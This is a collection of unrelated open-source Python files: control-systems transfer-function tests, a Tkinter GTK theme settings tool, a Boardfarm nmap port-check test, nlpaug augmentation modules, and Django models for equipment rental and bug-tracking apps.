"""Check minreal on discrete TFs."""
T = 0.01
z = TransferFunction([1, 0], [1], T)
h = (z - 1.00000000001) * (z + 1.0000000001) / (z**2 - 1)
hm = h.minreal()
hr = TransferFunction([1], [1], T)
np.testing.assert_array_almost_equal(hm.num[0][0], hr.num[0][0])
np.testing.assert_equal(hr.dt, hm.dt)
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_state_space_conversion_mimo(self):
"""Test conversion of a single input, two-output state-space
system against the same TF"""
s = TransferFunction([1, 0], [1])
b0 = 0.2
b1 = 0.1
b2 = 0.5
a0 = 2.3
a1 = 6.3
a2 = 3.6
a3 = 1.0
h = (b0 + b1*s + b2*s**2)/(a0 + a1*s + a2*s**2 + a3*s**3)
H = TransferFunction([[h.num[0][0]], [(h*s).num[0][0]]],
[[h.den[0][0]], [h.den[0][0]]])
sys = _convertToStateSpace(H)
H2 = _convert_to_transfer_function(sys)
np.testing.assert_array_almost_equal(H.num[0][0], H2.num[0][0])
np.testing.assert_array_almost_equal(H.den[0][0], H2.den[0][0])
np.testing.assert_array_almost_equal(H.num[1][0], H2.num[1][0])
np.testing.assert_array_almost_equal(H.den[1][0], H2.den[1][0])
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_indexing(self):
tm = ss2tf(rss(5, 3, 3))
# scalar indexing
sys01 = tm[0, 1]
np.testing.assert_array_almost_equal(sys01.num[0][0], tm.num[0][1])
np.testing.assert_array_almost_equal(sys01.den[0][0], tm.den[0][1])
# slice indexing
sys = tm[:2, 1:3]
np.testing.assert_array_almost_equal(sys.num[0][0], tm.num[0][1])
np.testing.assert_array_almost_equal(sys.den[0][0], tm.den[0][1])
np.testing.assert_array_almost_equal(sys.num[0][1], tm.num[0][2])
np.testing.assert_array_almost_equal(sys.den[0][1], tm.den[0][2])
np.testing.assert_array_almost_equal(sys.num[1][0], tm.num[1][1])
np.testing.assert_array_almost_equal(sys.den[1][0], tm.den[1][1])
np.testing.assert_array_almost_equal(sys.num[1][1], tm.num[1][2])
np.testing.assert_array_almost_equal(sys.den[1][1], tm.den[1][2])
def test_matrix_multiply(self):
"""MIMO transfer functions should be multiplyable by constant
matrices"""
s = TransferFunction([1, 0], [1])
b0 = 0.2
b1 = 0.1
b2 = 0.5
a0 = 2.3
a1 = 6.3
a2 = 3.6
a3 = 1.0
h = (b0 + b1*s + b2*s**2)/(a0 + a1*s + a2*s**2 + a3*s**3)
H = TransferFunction([[h.num[0][0]], [(h*s).num[0][0]]],
[[h.den[0][0]], [h.den[0][0]]])
H1 = (np.matrix([[1.0, 0]])*H).minreal()
H2 = (np.matrix([[0, 1.0]])*H).minreal()
np.testing.assert_array_almost_equal(H.num[0][0], H1.num[0][0])
np.testing.assert_array_almost_equal(H.den[0][0], H1.den[0][0])
np.testing.assert_array_almost_equal(H.num[1][0], H2.num[0][0])
np.testing.assert_array_almost_equal(H.den[1][0], H2.den[0][0])
def test_dcgain_cont(self):
"""Test DC gain for continuous-time transfer functions"""
sys = TransferFunction(6, 3)
np.testing.assert_equal(sys.dcgain(), 2)
sys2 = TransferFunction(6, [1, 3])
np.testing.assert_equal(sys2.dcgain(), 2)
sys3 = TransferFunction(6, [1, 0])
np.testing.assert_equal(sys3.dcgain(), np.inf)
num = [[[15], [21], [33]], [[10], [14], [22]]]
den = [[[1, 3], [2, 3], [3, 3]], [[1, 5], [2, 7], [3, 11]]]
sys4 = TransferFunction(num, den)
expected = [[5, 7, 11], [2, 2, 2]]
np.testing.assert_array_equal(sys4.dcgain(), expected)
def test_dcgain_discr(self):
"""Test DC gain for discrete-time transfer functions"""
# static gain
sys = TransferFunction(6, 3, True)
np.testing.assert_equal(sys.dcgain(), 2)
# averaging filter
sys = TransferFunction(0.5, [1, -0.5], True)
np.testing.assert_almost_equal(sys.dcgain(), 1)
# differencer
sys = TransferFunction(1, [1, -1], True)
np.testing.assert_equal(sys.dcgain(), np.inf)
# summer
# causes a RuntimeWarning due to the divide by zero
sys = TransferFunction([1,-1], [1], True)
np.testing.assert_equal(sys.dcgain(), 0)
def test_ss2tf(self):
A = np.array([[-4, -1], [-1, -4]])
B = np.array([[1], [3]])
C = np.array([[3, 1]])
D = 0
sys = ss2tf(A, B, C, D)
true_sys = TransferFunction([6., 14.], [1., 8., 15.])
np.testing.assert_almost_equal(sys.num, true_sys.num)
np.testing.assert_almost_equal(sys.den, true_sys.den)
def suite():
return unittest.TestLoader().loadTestsFromTestCase(TestXferFcn)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "joaoantoniocardoso/scripts",
"score": 3
} |
#### File: joaoantoniocardoso/scripts/setgtktheme.py
```python
from tkinter import *
from tkinter import messagebox
import os
def findThemes(themeType) :
homeDir = os.path.expanduser('~')
a = os.listdir("/usr/share/themes")
for x in a : a[a.index(x)] = "/usr/share/themes/" + x
if os.path.exists("/usr/local/share/themes") :
b = os.listdir("/usr/local/share/themes")
for x in b : b[b.index(x)] = "/usr/local/share/themes/" + x
else : b = []
if os.path.exists(homeDir + "/.themes") :
c = os.listdir(homeDir + "/.themes")
for x in c : c[c.index(x)] = homeDir + "/.themes/" + x
else : c = []
allThemes = a + b + c
final = []
for x in allThemes :
try : dirs = os.listdir(x)
except NotADirectoryError : continue
y = x.split("/")
if themeType == "gtk2" :
if "gtk-2.0" in (dirs) :
gDir = os.listdir(x + "/gtk-2.0")
if "gtkrc" in gDir :
if y[-1] not in final : final.append(y[-1])
else :
if "gtk-3.0" in (dirs) :
gDir = os.listdir(x + "/gtk-3.0")
if "gtk.css" in gDir :
if y[-1] not in final : final.append(y[-1])
#Some GTK+ 3 themes are present if GTK+ 3 itself is present, even if the
#gtk.css files are non-existent or empty. Therefore, make sure these
#themes are in the list
if themeType == "gtk3" :
#Existence of /usr/share/themes/Default/gtk-3.0 should indicate
#the presence of GTK+ 3 on the system
if "/usr/share/themes/Default" in allThemes :
if "gtk-3.0" in os.listdir("/usr/share/themes/Default") :
#As of March 2017, the presence of GTK+ 3 does not guarantee
#that the Raleigh GTK+ 3 theme is present - we now trigger a
#warning for this. See the update function.
if "Raleigh" not in final : final.append("Raleigh")
if "Adwaita" not in final : final.append("Adwaita")
if "HighContrast" not in final : final.append("HighContrast")
if "HighContrastInverse" not in final : final.append("HighContrastInverse")
if "win32" not in final : final.append("win32")
#We mustn't return an empty list so add a fallback value in this case
if final == [] : final.append("None found")
return sorted(final)
def findIcons(themeType) :
homeDir = os.path.expanduser('~')
a = os.listdir("/usr/share/icons")
for x in a : a[a.index(x)] = "/usr/share/icons/" + x
if os.path.exists("/usr/local/share/icons") :
b = os.listdir("/usr/local/share/icons")
for x in b : b[b.index(x)] = "/usr/local/share/icons/" + x
else : b = []
if os.path.exists(homeDir + "/.icons") :
c = os.listdir(homeDir + "/.icons")
for x in c : c[c.index(x)] = homeDir + "/.icons/" + x
else : c = []
allIcons = a + b + c
final = []
for x in allIcons :
try : dirs = os.listdir(x)
except NotADirectoryError : continue
y = x.split("/")
#Dir needs to contain index.theme and might well contain cursors dir. Therefore, the
#number of items within dir needs to be greater than 2 for it to contain a viable icon
#theme. For cursor theme, we only need the cursor dir.
if "index.theme" in dirs :
if themeType == "cursors" :
if "cursors" in dirs : final.append(y[-1])
else :
if len(dirs) > 2 : final.append(y[-1])
#Remove hicolor as this is a fallback icon theme that will be used anyway
if "hicolor" in final : final.remove("hicolor")
#We mustn't return an empty list so add a fallback value in this case
if final == [] : final.append("None found")
return sorted(final)
def getResource(sFile, resource) :
if resource == "gtk-button-images" or resource == "gtk-menu-images" \
or resource == "gtk-application-prefer-dark-theme" : default = 0
else : default = "None set"
homeDir = os.path.expanduser('~')
try :
if sFile == "gtk2" : file = open(homeDir + "/.gtkrc-2.0", "r")
elif sFile == "gtk3" : file = open(homeDir + "/.config/gtk-3.0/settings.ini", "r")
elif sFile == "xdg_cursor" : file = open(homeDir + "/.icons/default/index.theme", "r")
contents = file.read()
file.close()
contents = contents.split("\n")
for x in contents :
y = x.split("=")
if y[0].strip() == resource : return y[-1].strip().strip('"')
return default
except IOError :
return default
def setResource(sFile, resource, var) :
homeDir = os.path.expanduser('~')
if sFile == "gtk2" : path = homeDir + "/.gtkrc-2.0"
elif sFile == "gtk3" : path = homeDir + "/.config/gtk-3.0/settings.ini"
elif sFile == "xdg_cursor" : path = homeDir + "/.icons/default/index.theme"
if os.path.exists(path) :
#If the file exists, read it and try to find the resource name line
#If found, update it
found = False
file = open(path, "r")
contents = file.read()
file.close()
contents = contents.split("\n")
contents = [x for x in contents if x != ""]
for x in contents :
y = x.split("=")
if y[0].strip() == resource :
if y[0][-1] == " " :
if sFile == "gtk2" and var.get() != "1" and var.get() != "0" : z = str(resource + " = " + '"' + var.get() + '"')
else : z = str(resource + " = " + var.get())
else :
if sFile == "gtk2" and var.get() != "1" and var.get() != "0" : z = str(resource + "=" + '"' + var.get() + '"')
else : z = str(resource + "=" + var.get())
contents[contents.index(x)] = z
found = True
break
if found :
#If file exists and resource is present, update it
file = open(path, "w")
for x in contents :
if contents.index(x) == len(contents) -1 : file.write(x)
else : file.write(x + "\n")
elif not found and contents != [] :
#If the file exists and is not empty but the resource is not present, append it
file = open(path, "w")
for x in contents :
if contents.index(x) == len(contents) -1 : file.write(x)
else : file.write(x + "\n")
if sFile == "gtk2" :
if var.get() == "1" or var.get() == "0" : file.write("\n" + resource + " = " + var.get())
else : file.write("\n" + resource + " = " + '"' + var.get() + '"')
elif sFile == "gtk3" : file.write("\n" + resource + " = " + var.get())
elif sFile == "xdg_cursor" : file.write("\n" + resource + "=" + var.get())
else :
#If file exists but is empty, overwrite it
file = open(path, "w")
if sFile == "gtk2" :
if var.get() == "1" or var.get() == "0" : file.write(resource + " = " + var.get())
else : file.write(resource + " = " + '"' + var.get() + '"')
elif sFile == "gtk3" : file.write("[Settings]\n" + resource + " = " + var.get())
elif sFile == "xdg_cursor" : file.write("[Icon Theme]\n" + resource + "=" + var.get())
file.close()
else :
#If file does not exist, create it
if sFile == "gtk3" :
try : os.makedirs(homeDir + "/.config/gtk-3.0/")
except FileExistsError : pass
elif sFile == "xdg_cursor" :
try : os.makedirs(homeDir + "/.icons/default/")
except FileExistsError : pass
file = open(path, "w")
if sFile == "gtk2" :
if var.get() == "1" or var.get() == "0" : file.write(resource + " = " + var.get())
else : file.write(resource + " = " + '"' + var.get() + '"')
elif sFile == "gtk3" : file.write("[Settings]\n" + resource + " = " + var.get())
elif sFile == "xdg_cursor" : file.write("[Icon Theme]\n" + resource + "=" + var.get())
file.close()
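# Illustrative note (not part of the original flow): getResource returns plain strings, while
# setResource expects a Tk variable exposing .get(), mirroring how update() uses them, e.g.
#   current = getResource("gtk2", "gtk-theme-name")
#   theme = StringVar(); theme.set("Adwaita")    # "Adwaita" is just a hypothetical value
#   setResource("gtk2", "gtk-theme-name", theme)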
def endOnNewline(filePath) :
if os.path.exists(filePath) :
file = open(filePath, "r")
contents = file.read()
file.close()
if len(contents) > 0 :
if contents[-1] != '\n' :
file = open(filePath, "a")
file.write('\n')
file.close()
def update() :
changes = False
#Update GTK+ 2 theme
if ui.varOpG2.get() != getResource("gtk2", "gtk-theme-name") and ui.varOpG2.get() != "None found" :
setResource("gtk2", "gtk-theme-name", ui.varOpG2)
changes = True
#Update GTK+ 3 theme
if ui.varOpG3.get() != getResource("gtk3", "gtk-theme-name") and ui.varOpG3.get() != "None found" :
#Show a warning about GTK+ 3 Raleigh
if ui.varOpG3.get() == "Raleigh" and getResource("gtk3", "gtk-theme-name") != "Raleigh" :
messagebox.showwarning(title = "Warning", message = "The GTK+ 3 version of Raleigh was removed from GTK+ as of version 3.90.0. Despite it being listed here, it might not be present on your system.")
setResource("gtk3", "gtk-theme-name", ui.varOpG3)
changes = True
#Update GTK+ 2 and GTK+ 3 font
if ui.varOpFont.get() != getResource("gtk2", "gtk-font-name") :
setResource("gtk2", "gtk-font-name", ui.varOpFont)
changes = True
if ui.varOpFont.get() != getResource("gtk3", "gtk-font-name") :
setResource("gtk3", "gtk-font-name", ui.varOpFont)
changes = True
#Update GTK+ 2 and GTK+ 3 icons
if ui.varOpIcons.get() != getResource("gtk2", "gtk-icon-theme-name") and ui.varOpIcons.get() != "None found" :
setResource("gtk2", "gtk-icon-theme-name", ui.varOpIcons)
changes = True
if ui.varOpIcons.get() != getResource("gtk3", "gtk-icon-theme-name") and ui.varOpIcons.get() != "None found" :
setResource("gtk3", "gtk-icon-theme-name", ui.varOpIcons)
changes = True
#Update GTK+ 2, GTK+ 3 and XDG cursor theme
if ui.varOpCursors.get() != getResource("xdg_cursor", "Inherits") and ui.varOpCursors.get() != "None found" :
setResource("xdg_cursor", "Inherits", ui.varOpCursors)
changes = True
if ui.varOpCursors.get() != getResource("gtk2", "gtk-cursor-theme-name") and ui.varOpCursors.get() != "None found" :
setResource("gtk2", "gtk-cursor-theme-name", ui.varOpCursors)
changes = True
if ui.varOpCursors.get() != getResource("gtk3", "gtk-cursor-theme-name") and ui.varOpCursors.get() != "None found" :
setResource("gtk3", "gtk-cursor-theme-name", ui.varOpCursors)
changes = True
#Update images in GTK+ menus and buttons
if ui.varOpButtonImages.get() != bool(int(getResource("gtk2", "gtk-button-images"))) :
temp = StringVar()
temp.set(str(int(ui.varOpButtonImages.get())))
setResource("gtk2", "gtk-button-images", temp)
setResource("gtk3", "gtk-button-images", temp)
changes = True
if ui.varOpMenuImages.get() != bool(int(getResource("gtk2", "gtk-menu-images"))) :
temp = StringVar()
temp.set(str(int(ui.varOpMenuImages.get())))
setResource("gtk2", "gtk-menu-images", temp)
setResource("gtk3", "gtk-menu-images", temp)
changes = True
#Update dark theme
if ui.varOpDarkTheme.get() != bool(int(getResource("gtk3", "gtk-application-prefer-dark-theme"))) :
temp = StringVar()
temp.set(str(int(ui.varOpDarkTheme.get())))
setResource("gtk3", "gtk-application-prefer-dark-theme", temp)
changes = True
#Ensure that the last char in all files is a newline
homeDir = os.path.expanduser('~')
endOnNewline(homeDir + "/.gtkrc-2.0")
endOnNewline(homeDir + "/.config/gtk-3.0/settings.ini")
endOnNewline(homeDir + "/.icons/default/index.theme")
#Show completion message
if changes : messagebox.showinfo(title = "Complete!", message = "Restart your applications for the settings to take effect.")
else : messagebox.showinfo(title = "Complete!", message = "Settings files were already up to date. No changes were made.")
def darkThemeNote() :
if ui.varOpDarkTheme.get() :
messagebox.showinfo(title = "Note", message = "A dark theme variant is available only for some GTK+ 3 themes such as Adwaita.")
def reset() :
rmFilesFailed = False
question = "The following files will be deleted:\n\n ~/.gtkrc-2.0\n ~/.config/gtk-3.0/settings.ini\n ~/.icons/default/index.theme\n\nDo you want to continue?"
choice = messagebox.askyesno(title = "Reset", message = question)
if choice :
homeDir = os.path.expanduser('~')
try : os.remove(homeDir + "/.gtkrc-2.0")
except FileNotFoundError : pass
except IOError : rmFilesFailed = True
try : os.remove(homeDir + "/.config/gtk-3.0/settings.ini")
except FileNotFoundError : pass
except IOError : rmFilesFailed = True
try : os.remove(homeDir + "/.icons/default/index.theme")
except FileNotFoundError : pass
except IOError : rmFilesFailed = True
if rmFilesFailed : messagebox.showerror(title = "Error", message = "Errors occured whilst removing the settings files.")
ui.varOpG2.set(getResource("gtk2", "gtk-theme-name"))
ui.varOpG3.set(getResource("gtk3", "gtk-theme-name"))
ui.varOpFont.delete(0, len(ui.varOpFont.get()))
ui.varOpFont.insert(0, getResource("gtk2", "gtk-font-name"))
ui.varOpIcons.set(getResource("gtk2", "gtk-icon-theme-name"))
ui.varOpCursors.set(getResource("xdg_cursor", "Inherits"))
ui.varOpButtonImages.set(getResource("gtk2", "gtk-button-images"))
ui.varOpMenuImages.set(getResource("gtk2", "gtk-menu-images"))
ui.varOpDarkTheme.set(getResource("gtk3", "gtk-application-prefer-dark-theme"))
class UI() :
def __init__(self, parent) :
parent.title("Set GTK+ theme")
l1 = Label(parent, text = "Set the theme for GTK+ 2 and 3 applications", pady = 5, padx = 15, relief = RAISED)
l1.grid(row = 1, column = 1, columnspan = 2)
#GTK+ 2 section
l2 = Label(parent, text = "GTK+ 2 theme:", pady = 7, padx = 5).grid(row = 2, column = 1, sticky = W)
self.varOpG2 = StringVar(parent)
self.varOpG2.set(getResource("gtk2", "gtk-theme-name"))
themesG2 = findThemes("gtk2")
m1 = OptionMenu(parent, self.varOpG2, *themesG2).grid(row = 2, column = 2, sticky = W)
#GTK+ 3 section
l3 = Label(parent, text = "GTK+ 3 theme:", pady = 7, padx = 5).grid(row = 3, column = 1, sticky = W)
self.varOpG3 = StringVar(parent)
self.varOpG3.set(getResource("gtk3", "gtk-theme-name"))
themesG3 = findThemes("gtk3")
m2 = OptionMenu(parent, self.varOpG3, *themesG3).grid(row = 3, column = 2, sticky = W)
        #Hereafter, we're not supporting separate settings for GTK+ 2 and GTK+ 3.
#Font section
l4 = Label(parent, text = "GTK+ font:", pady = 7, padx = 5).grid(row = 4, column = 1, sticky = W)
self.varOpFont = Entry(parent)
self.varOpFont.grid(row = 4, column = 2, sticky = W)
self.varOpFont.insert(0, getResource("gtk2", "gtk-font-name"))
#Icons section
l5 = Label(parent, text = "GTK+ icons:", pady = 7, padx = 5).grid(row = 5, column = 1, sticky = W)
self.varOpIcons = StringVar(parent)
self.varOpIcons.set(getResource("gtk2", "gtk-icon-theme-name"))
icons = findIcons("icons")
m3 = OptionMenu(parent, self.varOpIcons, *icons).grid(row = 5, column = 2, sticky = W)
#Cursors section
l6 = Label(parent, text = "GTK+ cursors:", pady = 7, padx = 5).grid(row = 6, column = 1, sticky = W)
self.varOpCursors = StringVar(parent)
self.varOpCursors.set(getResource("xdg_cursor", "Inherits"))
cursors = findIcons("cursors")
m4 = OptionMenu(parent, self.varOpCursors, *cursors).grid(row = 6, column = 2, sticky = W)
#Button and menu images section
self.varOpButtonImages = BooleanVar(parent)
self.varOpMenuImages = BooleanVar(parent)
self.varOpButtonImages.set(getResource("gtk2", "gtk-button-images"))
self.varOpMenuImages.set(getResource("gtk2", "gtk-menu-images"))
imgButtonCheckbox = Checkbutton(parent, variable = self.varOpButtonImages, text = "Images in buttons", pady = 3).grid(row = 7, column = 1, sticky = W)
imgMenuCheckbox = Checkbutton(parent, variable = self.varOpMenuImages, text = "Images in menus", pady = 3).grid(row = 7, column = 2, sticky = W)
#Dark theme section
self.varOpDarkTheme = BooleanVar(parent)
self.varOpDarkTheme.set(getResource("gtk3", "gtk-application-prefer-dark-theme"))
darkThemeCheckbox = Checkbutton(parent, variable = self.varOpDarkTheme, text = "Use dark theme", command = darkThemeNote, pady = 3).grid(row = 8, column = 1, sticky = W)
#Buttons
b1 = Button(parent, text = "Close", padx = 5, pady = 5, bd = 3, command = parent.destroy).grid(row = 9, column = 1, sticky = W)
b2 = Button(parent, text = "Update", padx = 5, pady = 5, bd = 3, command = update).grid(row = 9, column = 2, sticky = E)
b3 = Button(parent, text = "Reset", padx = 5, pady = 5, bd= 3, command = reset).grid(row = 9, column = 1, columnspan = 2)
top = Tk()
ui = UI(top)
top.mainloop()
``` |
{
"source": "joaoantoniopereira/Boardfarm",
"score": 2
} |
#### File: Boardfarm/tests/test_nmap.py
```python
import random
import re
import rootfs_boot
from devices import board, lan, prompt
class TestNmap(rootfs_boot.RootFSBootTest):
def boot(self, reflash=True):
pass
def runTest(self):
lan.sendline('\nsudo nmap -p 20,21,22,23,53,80,443 192.168.1.254')
lan.expect(r'20/tcp.*?filtered', timeout=100)
lan.expect(r'21/tcp.*?open', timeout=100)
lan.expect(r'22/tcp.*?open', timeout=100)
lan.expect(r'23/tcp.*?open', timeout=100)
lan.expect(r'53/tcp.*?open', timeout=100)
lan.expect(r'80/tcp.*?open', timeout=100)
lan.expect(r'443/tcp.*?open', timeout=100)
lan.expect(prompt)
``` |
{
"source": "joaoantonioverdade/nlpaug",
"score": 3
} |
#### File: augmenter/audio/audio_augmenter.py
```python
from nlpaug.util import Method
from nlpaug import Augmenter
class AudioAugmenter(Augmenter):
def __init__(self, action, name='Audio_Aug', verbose=0):
super(AudioAugmenter, self).__init__(
name=name, method=Method.AUDIO, action=action, aug_min=1, verbose=verbose)
def substitute(self, data):
return self.model.manipulate(data)
```
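Concrete audio augmenters are expected to attach a model object exposing `manipulate` and delegate to it through `substitute`. A minimal sketch of that pattern, assuming the `Augmenter` base accepts the arguments forwarded above; `_GainModel` and `GainAug` are made-up stand-ins, not part of nlpaug:
```python
import numpy as np

from nlpaug.util import Action
from nlpaug.augmenter.audio.audio_augmenter import AudioAugmenter  # import path assumed from the file header


class _GainModel:
    """Stand-in model: scales the waveform, mimicking the manipulate() contract."""
    def manipulate(self, data):
        return data * 1.5


class GainAug(AudioAugmenter):
    def __init__(self, name='Gain_Aug', verbose=0):
        super().__init__(action=Action.SUBSTITUTE, name=name, verbose=verbose)
        self.model = _GainModel()


audio = np.random.uniform(-1, 1, 16000)  # one second of fake audio at 16 kHz
louder = GainAug().substitute(audio)     # delegates to _GainModel.manipulate
```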
#### File: augmenter/word/fasttext.py
```python
from nlpaug.augmenter.word import WordEmbsAugmenter
from nlpaug.util import Action
import nlpaug.model.word_embs as nmw
from nlpaug.util.decorator.deprecation import deprecated
FASTTEXT_MODEL = {}
def init_fasttext_model(model_path, force_reload=False):
"""
Load model once at runtime
"""
global FASTTEXT_MODEL
if FASTTEXT_MODEL and not force_reload:
return FASTTEXT_MODEL
fasttext = nmw.Fasttext()
fasttext.read(model_path)
FASTTEXT_MODEL = fasttext
return FASTTEXT_MODEL
@deprecated(deprecate_from='0.0.7', deprecate_to='0.0.9', msg="Use WordEmbsAug from 0.0.7 version")
class FasttextAug(WordEmbsAugmenter):
"""
    Augmenter that leverages fasttext embeddings to find the top n similar words for augmentation.
    :param str model_path: Downloaded model directory. Either model_path or model must be provided
    :param obj model: Pre-loaded model
    :param str action: Either 'insert' or 'substitute'. If value is 'insert', a new word will be injected at a random
        position according to the word embeddings calculation. If value is 'substitute', a word will be replaced
        according to the word embeddings calculation
    :param int aug_min: Minimum number of words that will be augmented.
    :param float aug_p: Percentage of words that will be augmented.
    :param int aug_n: Top n similar words to draw from
    :param list stopwords: List of words which will be skipped by the augment operation.
    :param func tokenizer: Customize the tokenization process
    :param func reverse_tokenizer: Customize the reverse tokenization process
    :param bool force_reload: If True, the model will be reloaded every time, which makes initialization slower.
:param str name: Name of this augmenter
>>> import nlpaug.augmenter.word as naw
>>> aug = naw.FasttextAug()
"""
def __init__(self, model_path='.', model=None, action=Action.SUBSTITUTE,
name='Fasttext_Aug', aug_min=1, aug_p=0.3, aug_n=5, stopwords=None,
tokenizer=None, reverse_tokenizer=None, force_reload=False,
verbose=0):
super().__init__(
model_path=model_path, aug_n=aug_n,
action=action, name=name, aug_p=aug_p, aug_min=aug_min, stopwords=stopwords,
tokenizer=tokenizer, reverse_tokenizer=reverse_tokenizer, verbose=verbose)
if model is None:
self.model = self.get_model(force_reload=force_reload)
else:
self.model = model
def get_model(self, force_reload=False):
return init_fasttext_model(self.model_path, force_reload)
```
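A rough sketch of the module-level cache in `init_fasttext_model`; the import path is inferred from the file header and the embedding file path is a placeholder. Note that the cache is per process, not per path, so a second call with a different path would still return the first loaded model unless `force_reload` is set:
```python
from nlpaug.augmenter.word.fasttext import init_fasttext_model  # import path assumed from the file header

vec_path = '/path/to/wiki.en.vec'                            # placeholder embedding file
model_a = init_fasttext_model(vec_path)                      # parses the file on first call
model_b = init_fasttext_model(vec_path)                      # returns the cached instance
assert model_a is model_b
model_c = init_fasttext_model(vec_path, force_reload=True)   # re-reads the file from disk
```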
#### File: model/lang_models/gpt2.py
```python
try:
import torch
from pytorch_transformers import GPT2Tokenizer, GPT2LMHeadModel
except ImportError:
# No installation required if not using this function
pass
from nlpaug.model.lang_models import LanguageModels
from nlpaug.util.selection.filtering import *
class Gpt2(LanguageModels):
SUBWORD_PREFIX = 'Ġ'
def __init__(self, model_path='gpt2', top_k=None, top_p=None, device=None):
super().__init__(device, top_k=top_k, top_p=top_p)
self.model_path = model_path
self.tokenizer = GPT2Tokenizer.from_pretrained(model_path)
self.model = GPT2LMHeadModel.from_pretrained(model_path)
self.model.to(device)
self.model.eval()
def id2token(self, _id):
return self.tokenizer.decode(_id, clean_up_tokenization_spaces=True).strip()
def predict(self, text, target_word=None, top_n=5):
# Convert feature
input_idxes = self.tokenizer.encode(text)
input_idxes = torch.tensor(input_idxes, device=self.device).unsqueeze(0).repeat(1, 1)
# Prediction
with torch.no_grad():
outputs = self.model(input_idxes)
target_token_logits = outputs[0][0][-1] # GPT2 only predict last token
# Filtering
if self.top_k is not None and 0 < self.top_k < len(target_token_logits):
target_token_logits, target_token_idxes = filter_top_n(
target_token_logits, top_n + self.top_k, -float('Inf'))
if self.top_p is not None and 0 < self.top_p < 1:
target_token_logits, target_token_idxes = filter_cum_proba(target_token_logits, self.top_p)
# Generate candidates
candidate_ids, candidate_probas = self.prob_multinomial(target_token_logits, top_n=top_n + 10)
results = self.get_candidiates(candidate_ids, candidate_probas, target_word, top_n)
return results
```
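A usage sketch for the wrapper above, assuming torch and pytorch_transformers are installed; the import path is inferred from the file header, and the exact shape of the returned candidates depends on `LanguageModels.get_candidiates`, which is not shown here:
```python
from nlpaug.model.lang_models.gpt2 import Gpt2  # import path assumed from the file header

lm = Gpt2(model_path='gpt2', top_k=50, device='cpu')
candidates = lm.predict('The weather today is', top_n=5)
print(candidates)  # candidate continuations for the final position
```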
#### File: model/spectrogram/spectrogram.py
```python
class Spectrogram:
def mask(self, data):
raise NotImplementedError()
```
#### File: model/word_stats/word_statistics.py
```python
import numpy as np
class WordStatistics:
def __init__(self, cache=True):
self.cache = cache
def train(self, data):
raise NotImplementedError()
def predict(self, data, top_n):
raise NotImplementedError()
def save(self, model_path):
raise NotImplementedError()
def read(self, model_path):
raise NotImplementedError()
@classmethod
def choice(cls, x, p, size=1):
return np.random.choice(len(x), size, p=p)
``` |
{
"source": "JoaoAPS/AlugaInstrumentos",
"score": 2
} |
#### File: backend/categorias/models.py
```python
from django.db import models
class Categoria(models.Model):
"""Categoria que um equipamento pode ter"""
name = models.CharField('nome', max_length=64)
is_instrument = models.BooleanField()
def __str__(self):
return self.name
def __repr__(self):
return "<Categoria: " + str(self) + '>'
```
#### File: equipamentos/tests/conftest.py
```python
import pytest
from django.urls import reverse
from equipamentos.models import Equipamento
from categorias.models import Categoria
@pytest.fixture
def list_url():
return reverse('equipamento-list')
@pytest.fixture
def detail_url():
def get_url(equip_id):
return reverse('equipamento-detail', args=[equip_id])
return get_url
@pytest.fixture
def equipamento(db, tmp_image):
cat = Categoria.objects.create(name='Test Cat', is_instrument=True)
equip = Equipamento.objects.create(
title='Test Equip',
description='lorem ipsum',
price_per_day=1.00,
is_instrument=True,
image=tmp_image.name
)
equip.categorias.add(cat)
return equip
```
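These fixtures are pulled into the equipment API tests by name; a minimal sketch using pytest-django's built-in `client` fixture is shown below. The assumption that the list endpoint is publicly readable and returns 200 is mine, not the project's, and `tmp_image` is expected to come from a higher-level conftest:
```python
def test_list_equipamentos_returns_ok(client, list_url, equipamento):
    # `equipamento` seeds the database (it depends on the db and tmp_image fixtures),
    # `list_url` resolves the list route, and `client` is pytest-django's test client.
    res = client.get(list_url)
    assert res.status_code == 200
```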
#### File: backend/users/models.py
```python
from django.db import models
from django.contrib.auth.models import BaseUserManager, AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
class UserManager(BaseUserManager):
def create_user(self, email: str, name: str, password: str):
"""Create and save a new user"""
user = self.model(email=email, name=name)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email: str, name: str, password: str):
"""Create and save a new superuser"""
user = self.create_user(email=email, name=name, password=password)
user.is_admin = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_admin = models.BooleanField(default=False)
objects = UserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['name']
def __str__(self):
return self.email
@property
def is_staff(self):
"""Is the user a member of staff?"""
return self.is_admin
def has_perm(self, perm, obj=None):
"Does the user have a specific permission?"
return True
def has_module_perms(self, app_label):
"Does the user have permissions to view the app `app_label`?"
return True
``` |
{
"source": "JoaoAPS/BugTracker",
"score": 2
} |
#### File: app/bugs/models.py
```python
from django.db import models
from django.contrib.auth import get_user_model
from projects.models import Project
class Bug(models.Model):
"""A bug in a project to be fixed"""
POSSIBLE_STATUS = ['BEING WORKED', 'WAITING', 'FIXED', 'CLOSED']
ACTIVE_STATUS = ['WAITING', 'BEING WORKED']
WORKING_STATUS = 'BEING WORKED'
WAITING_STATUS = 'WAITING'
STATUS_CLASSES = {
'WAITING': 'warning',
'BEING WORKED': 'primary',
'FIXED': 'success',
'CLOSED': 'danger'
}
title = models.CharField(max_length=255)
description = models.TextField(blank=True)
_status = models.CharField(max_length=15, default='WAITING')
creationDate = models.DateTimeField(auto_now_add=True)
closingDate = models.DateTimeField(null=True, blank=True, default=None)
project = models.ForeignKey(
Project, on_delete=models.CASCADE, related_name='bugs'
)
creator = models.ForeignKey(
get_user_model(), on_delete=models.CASCADE, related_name='created_bugs'
)
assigned_members = models.ManyToManyField(
get_user_model(), related_name='assigned_bugs', blank=True
)
@property
def status(self):
return self._status
def set_status(self, status):
"""Set the status of the bug checking for valid status"""
if status not in self.POSSIBLE_STATUS:
possibleVals = str(self.POSSIBLE_STATUS).strip('[]')
raise ValueError(
'Bug status must be one of the following: ' + possibleVals
)
self._status = status
@property
def status_tuples(self):
"""A list of tuples containing the status and its bootstrap class"""
return [(s, self.STATUS_CLASSES[s]) for s in self.POSSIBLE_STATUS]
@classmethod
def get_active(cls):
"""Return a queryset with the active bugs"""
return cls.objects.filter(_status__in=cls.ACTIVE_STATUS)
def __str__(self):
"""Return the string representation of the bug object"""
